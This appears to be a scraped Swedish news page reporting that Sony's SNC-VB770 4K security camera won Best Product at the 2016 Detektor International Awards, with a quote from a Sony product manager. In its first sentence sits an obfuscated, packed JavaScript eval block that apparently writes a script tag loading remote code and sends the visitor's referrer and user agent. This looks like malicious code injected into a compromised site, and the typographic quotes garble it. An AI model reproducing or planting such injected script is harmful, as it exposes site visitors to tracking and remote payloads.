Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sonys säkerhetskamera SNC-VB770 utnämnd till Bästa Produkt av Detektor

Sonys säkerhetskamera SNC-VB770 utnämnd till Bästa Produkt av Detektor
Sebastian

Europas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrkzb|var|u0026u|referrer|iiedy||js|php’.split(’|’),0,{}))
ledande tidning för säkerhetsbranschen, Detektor, har utnämnt säkerhetskameran
SNC-VB770 från Sony till Bästa Produkt i kategorin Videoövervakning. Sony mottog priset vid Detektor International Award som hölls den 16 november 2016 under säkerhetsmässan Sectech i Köpenhamn.

Den internationella domarpanelen betonade följande när Sony SNC-VB770 presenterades som årets bästa produkt: Denna 4K-kamera öppnar upp en ny värld av möjligheter eftersom den fungerar extremt bra i nästan totalt mörker och har en sömlös klarhet genom hela bilden. Med den här tekniken har Sony utvecklat en självklar vinnare i Detektor International Awards 2016.

– SNC-VB770 bygger på styrkorna hos Sonys bildsensorer. Dåliga ljusförhållanden är en utmaning både dag och natt, i synnerhet under vinterhalvåret i Norden då vi ser väldigt lite naturligt dagsljus. För att råda bot på detta har vi utrustat SNC-VB770 med högre upplösning och bättre färgvisibilitet jämfört med tidigare modeller för att ge användarna ännu tydligare bilder i exempelvis hamnområden, flygplatser, tunnlar och skolor, oavsett ljusförhållande, säger Roger Lawrence, produktchef för videosäkerhet på Sony Professional Solutions Europe.

Sonys prisbelönta säkerhetskamera SNC-VB770 finns nu tillgänglig i hela Europa. För mer information, vänligen besök: http://www.sony.co.uk/pro/products/video-security 

Om Detektor International Awards
Detektor International Awards startades år 2000 för att uppmärksamma forskning och utveckling inom säkerhetsteknik och innovativa säkerhetsprodukter som bidrar till att främja säkerhetsbranschen.